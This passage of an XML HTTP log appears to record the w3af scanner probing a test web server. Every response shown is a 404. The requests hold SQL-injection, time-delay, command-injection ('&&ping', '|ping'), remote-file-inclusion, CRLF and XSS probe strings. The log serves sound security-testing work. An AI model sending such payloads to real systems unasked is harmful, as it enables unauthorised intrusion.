                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="541">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="541">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="542">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="542">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="543">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="543">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="546">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="546">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="548">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="548">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="554">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/51+OR+51%3D51+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="554">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 51+OR+51%3D51+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='51+OR+51%3D51+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="567">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/51+AND+51%3D52+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="567">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 51+AND+51%3D52+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='51+AND+51%3D52+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="577">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="577">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="583">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="583">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="604">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="604">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="613">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="613">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="645">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/oiVI3U0l HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="645">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about oiVI3U0l has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='oiVI3U0l'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="660">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="660">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="664">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="664">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="670">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/9rYJZoeZ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="670">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 9rYJZoeZ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='9rYJZoeZ'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="686">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/s6oTQpp0 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="686">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about s6oTQpp0 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='s6oTQpp0'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="690">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/x1sas%3C%2F-%3Ex1sas%2F%2Ax1sas%22x1sasx1sas%27x1sasx1sas%60x1sasx1sas+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="690">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about x1sas%3C%2F-%3Ex1sas%2F%2Ax1sas%22x1sasx1sas%27x1sasx1sas%60x1sasx1sas+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='x1sas%3C%2F-%3Ex1sas%2F%2Ax1sas%22x1sasx1sas%27x1sasx1sas%60x1sasx1sas+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="696">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53%22+OR+%2253%22%3D%2253 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="696">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53%22+OR+%2253%22%3D%2253 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53%22+OR+%2253%22%3D%2253'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="703">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="703">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="704">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="704">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %7Cping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%7Cping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="705">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53%22+AND+%2253%22%3D%2254 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="705">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53%22+AND+%2253%22%3D%2254 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53%22+AND+%2253%22%3D%2254'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="720">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/86%22+OR+%2286%22%3D%2286 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="720">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 86%22+OR+%2286%22%3D%2286 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='86%22+OR+%2286%22%3D%2286'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="726">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/86%22+AND+%2286%22%3D%2287 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="726">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 86%22+AND+%2286%22%3D%2287 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='86%22+AND+%2286%22%3D%2287'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="730">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="730">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%27%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%27%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="731">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7Cping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse id="731">
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
